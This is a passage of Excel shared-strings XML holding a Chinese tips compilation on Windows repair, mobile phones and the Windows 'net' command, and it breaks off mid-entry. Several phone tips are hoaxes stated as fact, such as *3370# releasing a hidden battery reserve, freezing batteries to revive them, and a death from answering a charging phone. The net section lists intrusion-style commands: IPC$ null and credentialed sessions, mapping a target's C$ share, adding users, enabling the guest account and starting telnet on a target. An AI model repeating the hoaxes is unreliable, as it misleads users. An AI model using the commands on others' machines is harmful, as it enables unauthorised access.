        <charset val="134"/>
      </rPr>
      <t>或</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>.386</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>的那一行，将该行删除即可，如果修改有误，再用备份还原即可。　　</t>
    </r>
  </si>
  <si>
    <r>
      <t>　　</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>(</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>五</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>)</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>、如果</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> Windows</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>不能正常启动是由系统文件损坏造成的，可以运行在</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Windows\system</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>目录下的</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Sfc.exe</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>文件来检查并恢复遗失或损毁的系统文件，如果产生问题的那个文件是</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Windows</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>系统需要用到的，则会被修复回来。</t>
    </r>
  </si>
  <si>
    <r>
      <t>　　</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>(</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>六</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>)</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>、如果</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Windows</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>不能正常启动是由文件版本冲突造成的，可以运行</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Windows</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>目录下的</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Vemui.exe</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>文件，找出产生问题的文件后，选择“恢复所选文件（</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>R</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>）”按扭，则</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Windows98</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>会自动用不同号的版本取代目前使用文件，而版本冲突管理器也会给这个被取代的文件制作备份，可以再换回来。</t>
    </r>
  </si>
  <si>
    <t>快速格式化和普通格式化有什么不同？</t>
  </si>
  <si>
    <t>让你的手机随时变成空号</t>
  </si>
  <si>
    <t>方法如下</t>
  </si>
  <si>
    <t>在待机状态下  输入**21*999999#  再按下拨号键~  OK  大功告成~!</t>
  </si>
  <si>
    <t>在这种状态下  别人打你电话是空号  而你   也不会接到电话</t>
  </si>
  <si>
    <t>以前以为只有NOKIA的 才可以用    自己用索爱的试了下结果也可</t>
  </si>
  <si>
    <t>初步判断大部分手机都可以```  (注:由于没有测试所有机型  所以不能保证成功率)</t>
  </si>
  <si>
    <t>在此提醒   此状态就算关机开机也不会取消</t>
  </si>
  <si>
    <t>取消空号状态的代码是 ##21#  输入方法同上~   </t>
  </si>
  <si>
    <t>最后在此提醒   玩完了记得解除空号状态    以免误事````</t>
  </si>
  <si>
    <t>手机居然有这种用处!!</t>
  </si>
  <si>
    <t>1 隐形的备用电池</t>
  </si>
  <si>
    <t>你的手机电量不足了，为了让它能够继续使用，按*3370# 键，手机会重新启动，启动完毕后，你就会发现电量增加了50%。这部分隐藏的备用电量用完了你就必须得充电了，再次充电的时候，隐形的备用电池也同时充电，下次电量低的时候又可以用这个方法。知道这个在紧急情况下如果手机电量不足非常管用。</t>
  </si>
  <si>
    <t>2. 车用遥控器落在车里了?</t>
  </si>
  <si>
    <t>你的车用遥控能打开吧？如果可以，在你有一天将车用遥控器落在车里而且备用的遥控又在家里的话，你会发现有个手机真方便，用手机拨通家里人的手机，将你的手机拿在离车门一英尺的地方，同时家里人拿着遥控器在他的手机旁边按响遥控器上的开锁键，这边你的车门就可以打开了。这个方法不管你把车开得离家有多远都奏效。</t>
  </si>
  <si>
    <t>3、紧急情况</t>
  </si>
  <si>
    <t>全世界的手机都可以拨打的共同紧急救援号码是112，加入你发现自己所在的地区无手机信号覆盖，同时你又遇到了紧急状况，用你的手机拨打112准没错，因为这时候你的手机会自动搜索所有可用的网络并建立起紧急呼叫。特别有趣的是，即使你的手机是在键盘锁定的状态，你同样可以拨打112。试试吧！</t>
  </si>
  <si>
    <t>4. 手机被偷了？查看手机的序列号，只需键入* # 0 6 #</t>
  </si>
  <si>
    <t>    15位序列号会出现在手机屏幕上，全世界的每一台手机都有一个独一无二的序列号，把这个序列号记录下来并保存好。有一天如果你的手机不幸被偷了，打电话给手机提供商，并提供你的手机序列号，他们会帮你把手机屏蔽，这样即使小偷换了SIM卡，仍然无法使用，你的手机对小偷来说变得一无是处。如果全世界每个手机持有者都这么做，那么偷手机就没有意义了。在澳洲，警方甚至建立了一个被盗手机数据库，如果你的手机被找到了，就可以归还给你了。</t>
  </si>
  <si>
    <t>1、手机电池不要等到没电才充电。</t>
  </si>
  <si>
    <t>　　一般我们都会有一种想法就是手机的电池电力要全部放完再充电比较好基本上是没错的，因为我们在以前使用的充电电池大部分是镍氢( NiH )电池，而镍氢电池有所谓的记忆效应若不放完电再充的话会导致电池寿命急速减少。因此我们才会用到最后一滴电才开始充电。但现在的手机及一般IA产品大部分都用锂(Li)电池，而锂电池的话就没有记忆效应的问题。若大家还是等到全部用完电后再充的话反而会使得锂电池内部的化学物质无法反应而寿命减少。最好的方法就是没事就充电让它随时随地保持最佳满格状态 ，这样你的电池就可用的又长又久喔。这是从厂商那得到的 讯息，并经过本身测试而得。</t>
  </si>
  <si>
    <t>　　</t>
  </si>
  <si>
    <t>    2、当手机正在充电时，请勿接电话!!</t>
  </si>
  <si>
    <t>　　原因是手机在充电时，来电接听的话会有潜在的危险。印度有一个31岁在保险公司任职业务经理的年轻人，十几天前在手机还接着充电器的时候接听电话，过了几秒大量的电流经过手机，这个年轻人被摔落到地面，家人发现时，手指烧伤，心跳微弱，并且已经失去意识。经紧急送到医院后，医生宣布到院死亡。行动电话是目前大家最常使用的现代发明。然而，我们也必须要警觉到仪器致死的危险。</t>
  </si>
  <si>
    <t>    3、手机剩一格时不要使用</t>
  </si>
  <si>
    <t>　　收讯满格与只剩一格时相比,发射强度竟然相差1000倍以上.所以……常讲手机的人……要注意哦 ……^0^、昨天从一位交大教授那儿获得一项很重要的讯息,那就是当你发现手机的收讯强度只剩下一格的时候,宁可挂断不谈或者是改用公用电话.千万不要再滔滔不绝、口沫横飞、浓情蜜意、欲罢不能、没完没了…为什幺呢?大家都知道手机的电磁波一直是让人担心的问题.而手机的设计为了在收讯较差的地区仍能保有相当的通话质量,会加强手机的电磁波发射强度.当收讯满格与只剩一格时相比, 发射强度竟然相差1000倍以上.电磁波强度高达0.6W(瓦特).0.6W究竟有多强呢?我无法具体描述它对你的脑袋会有什幺不良影响,但可以换成两个例子来比较：</t>
  </si>
  <si>
    <t>　　1）把喇叭直径约4公分左右的小型收音机音量开到最大然后贴在耳朵上 ,那样的噪音能量一般为0.25W,不到0.5W。 　　</t>
  </si>
  <si>
    <t>　　2）把手指头放在输出强度0.1W的雷射光前面(相当于光纤网络的? D干线能量)几秒钟内你会有灼痛的感觉,你能长时间忍受上述这两种状况吗?</t>
  </si>
  <si>
    <t>　　那你又如何确认0.6W的电磁波紧贴在你的耳朵上会没事呢?</t>
  </si>
  <si>
    <t>　　4.12593+电话号码=陷阱</t>
  </si>
  <si>
    <t>　　你是不是把外地朋友的电话用17951+电话号码的格式储存在电话号码本里?而不是单独拨?那么收费就会从0.39元每分钟变成1.3元每分钟.我也向1860查询过了他们的解释是如果储存在电话号码本里?系统将无法识别。所以无法获得资费优惠，必须每次在键盘上直接按12xxx。神州行用户如此? 动感地带用户, 全球通也一样。如果你是一个中国移动用户，当你知道中国移动为你设置以下的陷阱的时候，便不再惊讶于你的话费为何会像长了翅膀一样的飞走。用12593+电话号码可以优惠，但如果你预先将“12593+电话号码“存在手机的电话本，使用的时候调出来然后拔打出去，这时中国移动不承认你使用了12593这种优惠的拔打方式，而按照直接拔打的方式计费。如果你是在漫游，两种计费方式可以相差7倍之多！当我得知如此计费之后，我真的不知如何表达我的愤怒，后来打10086咨询时，如果不是主动冶询问这个问题，工号为6608的小姐根本就不告诉我这样的计费。</t>
  </si>
  <si>
    <t>　　5、手机费的寄生虫</t>
  </si>
  <si>
    <t>　　手机莫名其妙定置了无用短信,强烈建议大家都看一下自己有没有中招，最简单方法退订每月偷你手机费的寄生虫！中国移动在3.15被迫推出一项新业务，如果您是中国移动的手机用户，键入数字“0000“，发送短信至10086，数秒钟内将自动回复一条短信列表，显示您的手机上究竟订制了哪些短信服务，究竟是哪些短信服务商明着、暗着每月扣除您的手机费；键入数字“00000“，发送短信至186201，即可退订所有 短信服务 。</t>
  </si>
  <si>
    <t>我们打电话的时候常常会为了正好赶在1:00前结束而庆幸,但其实并不是这样的,据一位中国移动的工作人员说,其实在你通话到0:55的时候就已经算一分钟了,所以0:55~1:00的通话时间其实是算你2分钟的钱~</t>
  </si>
  <si>
    <t>    7. 手机一进水，请切记不要作任何按键动作，尤其是关机(一按任何动作，水马上会跟着电路板流串)，正确的方法为马上打开外盖，直接将电池拿下，直接强迫断电，可保主机板不被水侵袭。</t>
  </si>
  <si>
    <t>　　这个常识非常重要，故转告各位，使大家的手机可用久一点。学一学吧！以后以备不时之需啊！　</t>
  </si>
  <si>
    <t>　　8.如何让手机电池起死回生</t>
  </si>
  <si>
    <t>　　当你的行动电话电池使用时间变短(记忆效应或老化)时,你是否会再买一颗电池来更换呢?</t>
  </si>
  <si>
    <t>　　下次当你碰到这种情况时请省下你的钱,告诉你一个很有效的方法不妨试试看：</t>
  </si>
  <si>
    <t>　　1.把电池用报纸包起来再放进塑料袋裹包好放入冷冻库三天(报纸可吸收多余水份)</t>
  </si>
  <si>
    <t>　　2.三天后取出常温下放二天</t>
  </si>
  <si>
    <t>　　3.二天后将电池充电 , 充饱后装进行动电话裹测试 (预估可救回 80%-90%)</t>
  </si>
  <si>
    <t>　　本讯息由知名电池厂商工程师透露,根据测试过的朋友指出效果相当有效.</t>
  </si>
  <si>
    <t>　　至于有没有效果,反正电池快没用了,而且冰箱人人有,各位朋友不妨试试看吧 !</t>
  </si>
  <si>
    <t>　　9.给你的手机做个CPR吧！</t>
  </si>
  <si>
    <t>　　手机是否常断电？或是明明充饱了电没多久就又没电了？</t>
  </si>
  <si>
    <t>　　一定怀疑过是不是手机的寿命终了？</t>
  </si>
  <si>
    <t>　　别担心，它只是一时“心跳停止”，只要一块小小的橡皮擦就能起死回生了！</t>
  </si>
  <si>
    <t>　　把电池取出后用橡皮擦把电池上的接点(黄铜片)擦干净，再装回手机上，??会发现真是太神奇了！它竟然活过来了！还像颗新的呢！</t>
  </si>
  <si>
    <t>　　真的很有用，提供大家做参考！</t>
  </si>
  <si>
    <t>　　10.教你如何消除手机屏幕刮痕</t>
  </si>
  <si>
    <t>　　大家是否常常会遇到手机屏幕有刮痕而不知如何处理的情况呢？</t>
  </si>
  <si>
    <t>　　告诉大家一个好用的秘方....(前几天在电视上看到的)</t>
  </si>
  <si>
    <t>　　把牙膏适量挤在湿抹布上后用力在手机屏幕刮伤处前后左右来回用力涂匀.....</t>
  </si>
  <si>
    <t>　　你将发现.....手机的屏幕刮痕会因此而消失....很神奇吧... !!</t>
  </si>
  <si>
    <t>　　更神奇的事....在用干净的抹布或卫生纸擦干净后..手机屏幕还会变得更亮哦....</t>
  </si>
  <si>
    <t>　　台大化学教授表示：原理为牙膏它只是刷牙的辅助用品，具有磨擦作用(修补作用)</t>
  </si>
  <si>
    <t>　　和去除菌斑，清洁抛光牙面，因此使用在手机屏幕上面会有同样的效果。</t>
  </si>
  <si>
    <t>怎样格式化所有硬盘分区？</t>
  </si>
  <si>
    <t>C盘以外的其它盘都可以在windows环境中格式化。</t>
  </si>
  <si>
    <t>如格式化C盘，必须进入DOS下，当出现提示符后键入“format c:/q” ，就是把C盘快速格式化了。</t>
  </si>
  <si>
    <t>安装系统</t>
  </si>
  <si>
    <t>e盘作为程序安装和文档储存区。</t>
  </si>
  <si>
    <t>也就是说，c盘是纯粹的系统＋杀毒软件。</t>
  </si>
  <si>
    <t>方法是在桌面点右键，“属性”——“屏幕保护程序”——“电源”——“休眠”。</t>
  </si>
  <si>
    <t>方法是“我的电脑”——“属性”——“系统还原”，关掉全部的即可。</t>
  </si>
  <si>
    <t>方法是在任务栏上输入法旁边的下箭头，选择“设置”来进行进一步的细节设置</t>
  </si>
  <si>
    <t>比如flashget，界面上在“已下载”目录上点右键，然后改目录。“已删除”等等都改。因为默认的是在c盘。emule是在“选项”里改。</t>
  </si>
  <si>
    <t>XP安装</t>
  </si>
  <si>
    <t>XP安装</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>在“运行”中输入</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>CMD</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>，调出</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>DOS</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">net use $"&gt;\\ip\ipc$ " " /user:" " </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>建立</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>IPC</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空链接</t>
    </r>
  </si>
  <si>
    <r>
      <t>net use $"&gt;\\ip\ipc$ "</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>密码</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>" /user:"</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>用户名</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">" </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>建立</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>IPC</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>非空链接</t>
    </r>
  </si>
  <si>
    <r>
      <t>net use h: $"&gt;\\ip\c$ "</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>密码</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>" /user:"</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>用户名</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">" </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>直接登陆后映射对方</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>C</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>：到本地为</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>H:</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">net use h: $"&gt;\\ip\c$ </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>登陆后映射对方</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>C</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>：到本地为</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>H:</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">net use $"&gt;\\ip\ipc$ /del </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>删除</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>IPC</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>链接</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">net use h: /del </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>删除映射对方到本地的为</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>H:</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>的映射</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">net user </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>用户名</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>密码</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> /add </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>建立用户</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">net user guest /active:yes </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>激活</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>guest</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>用户</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">net start </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>服务名</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>开启服务；</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>(</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>如</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>:net start telnet</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>，</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> net start schedule)</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">net stop </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>服务名</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>停止某服务</t>
    </r>
  </si>
  <si>
    <r>
      <t>net time \\</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>目标</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">ip </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>查看对方时间</t>
    </r>
  </si>
  <si>
    <r>
      <t>net time \\</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>目标</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">ip /set </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>设置本地计算机时间与“目标</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>IP</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>”主机的时间同步</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>,</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>加上参数</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>/yes</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>可取消确认信息</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">net view \\ip </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>查看对方局域网内开启了哪些共享</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">net config </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>显示系统网络设置</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">net pause </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>服务名</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>暂停某服务</t>
    </r>
  </si>
  <si>
    <r>
      <t>net send ip "</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
